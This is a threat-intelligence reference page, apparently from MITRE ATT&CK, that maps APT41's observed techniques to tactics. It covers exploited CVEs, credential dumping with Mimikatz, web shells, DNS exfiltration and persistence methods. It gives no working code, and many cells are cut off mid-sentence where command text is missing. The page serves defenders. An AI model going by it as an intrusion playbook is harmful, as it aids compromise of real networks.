APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[1][2]
Domain | ID | Name | Use | |
---|---|---|---|---|
Enterprise | T1134 | Access Token Manipulation |
During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local |
|
Enterprise | T1087 | .001 | Account Discovery: Local Account |
APT41 used built-in |
.002 | Account Discovery: Domain Account |
APT41 used built-in |
||
Enterprise | T1098 | Account Manipulation |
APT41 has added user accounts to the User and Admin groups.[1] |
|
Enterprise | T1595 | .002 | Active Scanning: Vulnerability Scanning |
APT41 used the Acunetix SQL injection vulnerability scanner in target reconnaissance operations, as well as the JexBoss tool to identify vulnerabilities in Java applications.[6] |
.003 | Active Scanning: Wordlist Scanning |
APT41 leverages various tools and frameworks to brute-force directories on web servers.[6] |
||
Enterprise | T1071 | .001 | Application Layer Protocol: Web Protocols |
APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[7] During C0017, APT41 ran |
.002 | Application Layer Protocol: File Transfer Protocols |
APT41 used exploit payloads that initiate download via ftp.[7] |
||
.004 | Application Layer Protocol: DNS | |||
Enterprise | T1560 | .001 | Archive Collected Data: Archive via Utility |
APT41 created a RAR archive of targeted files for exfiltration.[1] |
.003 | Archive Collected Data: Archive via Custom Method |
During C0017, APT41 hex-encoded PII data prior to exfiltration.[5] |
||
Enterprise | T1197 | BITS Jobs |
APT41 used BITSAdmin to download and install payloads.[7][3] |
|
Enterprise | T1547 | .001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
APT41 created and modified startup files for persistence.[1][2] APT41 added a registry key in |
Enterprise | T1110 | .002 | Brute Force: Password Cracking |
APT41 performed password brute-force attacks on the local admin account.[1] |
Enterprise | T1059 | .001 | Command and Scripting Interpreter: PowerShell |
APT41 leveraged PowerShell to deploy malware families in victims’ environments.[1][7] |
.003 | Command and Scripting Interpreter: Windows Command Shell |
APT41 used During C0017, APT41 used |
||
.004 | Command and Scripting Interpreter: Unix Shell |
APT41 executed |
||
.007 | Command and Scripting Interpreter: JavaScript |
During C0017, APT41 deployed JScript web shells on compromised systems.[5] |
||
Enterprise | T1136 | .001 | Create Account: Local Account | |
Enterprise | T1543 | .003 | Create or Modify System Process: Windows Service |
APT41 modified legitimate Windows services to install malware backdoors.[1][2] APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.[7] |
Enterprise | T1555 | .003 | Credentials from Password Stores: Credentials from Web Browsers |
APT41 used BrowserGhost, a tool designed to obtain credentials from browsers, to retrieve information from password stores.[6] |
Enterprise | T1486 | Data Encrypted for Impact |
APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.[1] |
|
Enterprise | T1213 | .003 | Data from Information Repositories: Code Repositories |
APT41 cloned victim user Git repositories during intrusions.[6] |
Enterprise | T1005 | Data from Local System |
APT41 has uploaded files and data from a compromised host.[2] During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.[5] |
|
Enterprise | T1001 | .003 | Data Obfuscation: Protocol Impersonation |
During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.[5] |
Enterprise | T1074 | .001 | Data Staged: Local Data Staging |
During C0017, APT41 copied the local |
Enterprise | T1030 | Data Transfer Size Limits |
APT41 transfers post-exploitation files dividing the payload into fixed-size chunks to evade detection.[6] |
|
Enterprise | T1140 | Deobfuscate/Decode Files or Information |
During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.[5] |
|
Enterprise | T1568 | .002 | Dynamic Resolution: Domain Generation Algorithms | |
Enterprise | T1546 | .008 | Event Triggered Execution: Accessibility Features | |
Enterprise | T1480 | .001 | Execution Guardrails: Environmental Keying |
APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.[8] |
Enterprise | T1048 | .003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol |
During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.[5] |
Enterprise | T1041 | Exfiltration Over C2 Channel |
During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.[5] |
|
Enterprise | T1567 | Exfiltration Over Web Service |
During C0017, APT41 used Cloudflare services for data exfiltration.[5] |
|
Enterprise | T1190 | Exploit Public-Facing Application |
APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central through unsafe deserialization, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.[7] APT41 leveraged vulnerabilities such as ProxyLogon exploitation or SQL injection for initial access.[6] During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.[5] |
|
Enterprise | T1203 | Exploitation for Client Execution |
APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[1] |
|
Enterprise | T1068 | Exploitation for Privilege Escalation |
During C0017, APT41 abused named pipe impersonation for privilege escalation.[5] |
|
Enterprise | T1133 | External Remote Services |
APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.[1] |
|
Enterprise | T1008 | Fallback Channels |
APT41 used the Steam community page as a fallback mechanism for C2.[1] |
|
Enterprise | T1083 | File and Directory Discovery |
APT41 has executed |
|
Enterprise | T1589 | .001 | Gather Victim Identity Information: Credentials |
To support initial access, APT41 gained access to databases with information about existing accounts as well as plaintext and hashed passwords.[6] |
.003 | Gather Victim Identity Information: Employee Names |
To support initial access, APT41 gained access to databases with information about existing accounts and lists of employees.[6] |
||
Enterprise | T1574 | .001 | Hijack Execution Flow: DLL Search Order Hijacking |
APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.[3] |
.002 | Hijack Execution Flow: DLL Side-Loading |
APT41 used legitimate executables to perform DLL side-loading of their malware.[1] |
||
.006 | Hijack Execution Flow: Dynamic Linker Hijacking | |||
Enterprise | T1562 | .006 | Impair Defenses: Indicator Blocking |
APT41 developed a custom injector that enables an Event Tracing for Windows (ETW) bypass, making malicious processes invisible to Windows logging.[6] |
Enterprise | T1070 | .001 | Indicator Removal: Clear Windows Event Logs |
APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.[1] |
.003 | Indicator Removal: Clear Command History |
APT41 attempted to remove evidence of some of its activity by deleting Bash histories.[1] |
||
.004 | Indicator Removal: File Deletion | |||
Enterprise | T1105 | Ingress Tool Transfer |
APT41 used certutil to download additional files.[7][3][2] APT41 downloaded post-exploitation tools such as Cobalt Strike via command shell following initial access.[6] During C0017, APT41 downloaded malicious payloads onto compromised systems.[5] |
|
Enterprise | T1056 | .001 | Input Capture: Keylogging |
APT41 used a keylogger called GEARSHIFT on a target system.[1] |
Enterprise | T1570 | Lateral Tool Transfer |
APT41 uses remote shares to move and remotely execute payloads during lateral movemement.[6] |
|
Enterprise | T1036 | .004 | Masquerading: Masquerade Task or Service |
APT41 has created services to appear as benign system tools.[2] During C0017, APT41 used |
.005 | Masquerading: Match Legitimate Name or Location |
APT41 attempted to masquerade their files as popular anti-virus software.[1][2] During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.[5] |
||
Enterprise | T1112 | Modify Registry |
APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.[1][2] |
|
Enterprise | T1104 | Multi-Stage Channels |
APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.[7] |
|
Enterprise | T1046 | Network Service Discovery |
APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.[1] |
|
Enterprise | T1135 | Network Share Discovery |
APT41 used the |
|
Enterprise | T1027 | Obfuscated Files or Information |
APT41 used VMProtected binaries in multiple intrusions.[7] During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.[5] |
|
.002 | Software Packing |
APT41 uses packers such as Themida to obfuscate malicious files.[6] During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.[5] |
||
Enterprise | T1588 | .002 | Obtain Capabilities: Tool |
APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.[1] For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.[5] |
Enterprise | T1003 | .001 | OS Credential Dumping: LSASS Memory |
APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.[1][2] |
.002 | OS Credential Dumping: Security Account Manager |
APT41 extracted user account data from the Security Account Managerr (SAM), making a copy of this database from the registry using the During C0017, APT41 copied the |
||
.003 | OS Credential Dumping: NTDS |
APT41 used ntdsutil to obtain a copy of the victim environment |
||
Enterprise | T1069 | Permission Groups Discovery |
APT41 used |
|
Enterprise | T1566 | .001 | Phishing: Spearphishing Attachment |
APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.[1] |
Enterprise | T1542 | .003 | Pre-OS Boot: Bootkit |
APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.[1] |
Enterprise | T1055 | Process Injection |
APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.[1] |
|
Enterprise | T1090 | Proxy |
APT41 used a tool called CLASSFON to covertly proxy network communications.[1] During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.[5] |
|
Enterprise | T1012 | Query Registry |
APT41 queried registry values to determine items such as configured RDP ports and network configurations.[6] |
|
Enterprise | T1021 | .001 | Remote Services: Remote Desktop Protocol | |
.002 | Remote Services: SMB/Windows Admin Shares |
APT41 has transferred implant files using Windows Admin Shares.[3] |
||
Enterprise | T1496 | Resource Hijacking |
APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.[1] |
|
Enterprise | T1014 | Rootkit | ||
Enterprise | T1053 | .005 | Scheduled Task/Job: Scheduled Task |
APT41 used a compromised account to create a scheduled task on a system.[1][3] During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: |
Enterprise | T1596 | .005 | Search Open Technical Databases: Scan Databases |
APT41 uses the Chinese website fofa.su, similar to the Shodan scanning service, for passive scanning of victims.[6] |
Enterprise | T1505 | .003 | Server Software Component: Web Shell |
During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.[5] |
Enterprise | T1553 | .002 | Subvert Trust Controls: Code Signing |
APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.[1][2] |
Enterprise | T1195 | .002 | Supply Chain Compromise: Compromise Software Supply Chain |
APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.[1] |
Enterprise | T1218 | .001 | System Binary Proxy Execution: Compiled HTML File | |
.011 | System Binary Proxy Execution: Rundll32 | |||
Enterprise | T1082 | System Information Discovery |
APT41 uses multiple built-in commands such as During C0017, APT41 issued |
|
Enterprise | T1016 | System Network Configuration Discovery |
APT41 collected MAC addresses from victim machines.[1][2] During C0017, APT41 used |
|
Enterprise | T1049 | System Network Connections Discovery |
APT41 has enumerated IP addresses of network resources and used the |
|
Enterprise | T1033 | System Owner/User Discovery |
APT41 has executed During C0017, APT41 used |
|
Enterprise | T1569 | .002 | System Services: Service Execution |
APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.[7][2] |
Enterprise | T1550 | .002 | Use Alternate Authentication Material: Pass the Hash |
APT41 uses tools such as Mimikatz to enable lateral movement via captured password hashes.[6] |
Enterprise | T1078 | Valid Accounts |
APT41 used compromised credentials to log on to other systems.[1][3] |
|
Enterprise | T1102 | .001 | Web Service: Dead Drop Resolver |
APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.[1] During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.[5] |
Enterprise | T1047 | Windows Management Instrumentation |
APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.[1][2] |